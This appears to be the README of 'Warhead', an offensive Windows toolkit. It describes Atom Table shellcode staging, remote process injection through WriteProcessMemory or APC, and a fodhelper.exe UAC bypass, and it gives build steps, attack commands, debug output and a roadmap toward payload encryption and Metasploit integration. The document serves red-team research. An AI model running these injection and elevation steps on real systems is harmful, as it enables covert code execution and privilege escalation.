Atom Table Shellcode Injection & UAC Bypass Toolkit
Covert code execution via Windows Atom Table manipulation.
Tested on Windows 10/11 (x64). For research and educational use only.
DEFCON33\Blackhat 2025 release is now out - download the first public version here:
Warhead is a proof-of-concept offensive security toolkit that explores novel methods of Windows shellcode injection using the Atom Table, including:
- Shellcode storage and retrieval via
GlobalAddAtom/GetAtomName - Local and remote process injection (via direct memory write or APC)
- Hybrid UAC bypass payload launchers (e.g., via
fodhelper.exe) - Stealthy dropper/loader combinations with cross-session support
- Benign option built-in (launch calc)
This project aims to showcase Atom-based payload delivery and execution as an evasion mechanism that abuses legitimate Windows APIs.
| Feature | Description |
|---|---|
| Shellcode Staging | Atom Table-based payload storage |
| Remote Process Injection | Target remote PIDs with shellcode using WriteProcessMemory or APC |
| UAC Bypass | Execute payloads via fodhelper.exe elevation trick |
| Dropper Utilities | Standalone droppers that retrieve shellcode by Atom ID |
| APC Hybrid Mode | Execute Atom payloads via QueueUserAPC for stealth |
| Global Compatibility | Supports GlobalAddAtom for session-wide injection |
| Logging / Debug Output | Clear logs for debugging payload execution paths |
+------------------+
| Warhead.exe |
| (Main Launcher) |
+--------+---------+
|
v
+------------------------------------+
| 1. Add Payload to Atom Table |
| - Local or Global Atom |
+------------------------------------+
|
v
+------------------------------------+
| 2. Identify Target Process (PID) |
| - E.g. notepad.exe |
+------------------------------------+
|
v
+------------------------------------+
| 3. Inject Shellcode |
| - WriteProcessMemory |
| - or APC Injection |
+------------------------------------+
|
v
+------------------------------------+
| 4. Trigger Execution |
| - Remote Thread or APC Dispatch |
+------------------------------------+
- Windows 10/11 (x64)
- Admin privileges for certain injection types
- Visual Studio / mingw64 for compiling (if building from source)
git clone https://github.com/youruser/warhead.git
cd warhead
cl /EHsc /FeWarhead.exe src/main.cppWarhead.exe --write-atom "cmd /c calc.exe"Outputs Atom ID (e.g., 0xc000) to be used in later stages.
Warhead.exe --inject --pid 1234 --atom-id 0xc000Uses WriteProcessMemory to inject Atom payload into process with PID 1234.
Warhead.exe --apc --pid 1234 --atom-id 0xc000Injects shellcode and schedules execution via QueueUserAPC.
Warhead.exe --elevate --atom-id 0xc000Uses fodhelper.exe to launch elevated process that reads Atom and executes it.
Warhead.exe --dropper --command "cmd /c calc.exe"Writes to Atom Table, finds a remote target, injects and executes all in one go.
[DEBUG] Atom ID: 0xc000
[DEBUG] Local GetAtomNameA result: 21
[DEBUG] Atom content: cmd /c start calc.exe
[+] Found Notepad PID: 1234
[DEBUG] Remote Write success
[+] Atom shellcode launched from remote process.
This tool is provided for educational and research purposes only. Do not use it on systems you do not own or have explicit permission to test.
Developed by Malienist
Inspired by public Atom Table and UAC bypass research
We’re always looking for talented security researchers, red teamers, and reverse engineers to help develop new techniques or improve existing ones.
Why contribute?
- Collaborate with a crew of experienced offensive security specialists.
- Get exclusive Warhead Crew t-shirts.
- Opportunity to present your techniques at major infosec conferences (with full credit).
- Shape the future of payload execution research and red team tooling.
💡 How to get involved
- Fork the repo and start building.
- Submit a Pull Request with your technique, PoC, or improvement.
- Join discussions on the roadmap and future features.
Your skills + our platform = better red team capabilities for authorized testing.
- Add syscall-based injection fallback
- Implement Atom payload encryption
- Add multi-arch support (x86/x64)
- Integrate with Metasploit stager payloads



